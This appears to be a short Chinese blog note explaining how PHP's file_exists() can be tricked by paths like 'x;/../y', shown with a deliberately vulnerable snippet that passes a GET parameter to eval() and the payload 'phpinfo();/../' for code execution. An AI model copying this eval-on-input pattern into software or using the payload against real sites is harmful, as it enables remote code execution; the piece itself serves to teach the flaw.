PHP file_exists 函数逃逸

php.png
file_exists("index/1.txt") ==true
file_exists("index/1;/../1.txt") ==true

然后再来看一段代码;

<?php

$a = $_GET['index'.$a.'/index.html'];

if (file_exists($a)){
    var_dump($a);
    eval($a);
}else{
    var_dump($a);
    echo "hahahah";
}

?>

这时传入phpinfo();/../
导致了代码执行

一篇很经典的案例:https://www.freebuf.com/vuls/183658.html